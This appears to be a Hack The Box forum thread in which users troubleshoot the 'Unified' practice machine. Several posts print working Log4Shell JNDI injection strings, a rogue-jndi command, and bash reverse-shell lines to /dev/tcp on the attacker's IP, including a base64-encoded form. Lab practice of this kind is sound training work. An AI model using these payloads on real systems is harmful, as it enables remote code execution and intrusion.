Stuck on Unified Box (Starting Point Tier 2)

HTB Content Machines
1

I’m super stuck on the HTB Starting Point Box “Unified”. Can’t seem to get a reverse shell for the life of me.

Related to this thread on Reddit yet for some reason I couldn’t post this on there.

Only difference to the HTB write-up is that I’m using Zaproxy instead of BurpSuite, yet the the steps are the same.

The response from rogue-jndi is there:

Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

So I know I’m getting some kind of connection from the target, yet my netcat listener doesn’t do anything:

sudo netcat -lvnp 4444 
listening on [any] 4444 ...

Here are the notes I’ve made on the box so far:

target = 10.129.163.80

target url = https://target_IP:8443/manage/account/login?redirect=%2Fmanage

Our IP = 10.10.16.140

payload 1 =

"${jndi:ldap://10.10.16.140}" # Injected into “remember” field on login page. Used to confirm vulnerability by establishing tcpdump reverse connection on port 389

payload 2 =

"${jndi:ldap://10.10.16.140:1389/o=tomcat}" # Injected into “remember” field on login page. Rogue-Jndi captures connection on port 1389. Spawns shell on netcat listener

Reverse shell base64 encoding =

echo 'bash -c bash -i >&/dev/tcp/10.10.16.140/4444 0>&1' | base64

Base64 Reverse Shell Value = YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTQwLzQ0NDQgMD4mMQo=

RogueJndi Payload =

java -jar Github/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTQwLzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "[10.10.16.140](https://10.10.16.140/)" # used to create jndi reverse listener

Can anyone see where I’ve gone wrong? This box is driving me nuts!

One thing I have noticed is that on every write-up I’ve seen, their base64 value has two “=” signs at the end, where mine just has one? Don’t know if this is relevant or not?

2

Finally managed to get a shell, seemed to be an issue with my base64 input, perhaps line break problems, I’m not sure.

1 Like
3

when you copy and paste from the example

image
image902×192 21.5 KB

it will put the {base64, -d} on a third line like this

image
image1968×158 76.9 KB

put the curser in front of {base64, -d} and hit backspace to make it go back to 2 lines. It should look like this

image
image3052×102 70.3 KB

2 Likes
4

It worked somehow…
I dont know why it worked but thanks !!

5

I sat there all day and it didn’t work either.
It turns out that the problem is ampersand, it simply redirected incorrectly.
Here is the correct:
echo ‘bash -c bash -i >/dev/tcp/YOR IP/4444 0>&1’ | base64

6

urrrrggghhhh 8hrs for this, error" its just fckn* "SPAAAAACEEEE*!!! anyway, thanks guys, hacking is fun!

7

make sure your VPN’s protocol is TCP 443 and not UDP 1334 which is the default when you want to download your ovpn file for the first time :triumph:

8

I was using my Kali VM setup with OpenVPN and I tried every trick I could find online, but when I sent the Burp request the final time, it would just timeout and nothing would happen. The only thing that finally worked for me was switching to Pwnbox, then I did exactly what I had been doing and it worked immediately. So there was something my setup was having an issue with. I wish I knew what it was. I tried switching VPN protocols and resetting the machine several times. Maybe it was a port forwarding issue with port 1389? All the different ports mentioned in this lab weren’t really explained, and the walkthrough is simply following another walkthrough which also doesn’t explain things…
If anyone’s still stuck on this one, try using Pwnbox just to get through it.

9

This is driving me mad now.
I wasnt getting anything back on nc, then deleted the spaces between the pipes.
Sorted.
But now on nc I get ‘inverse host lookup failed’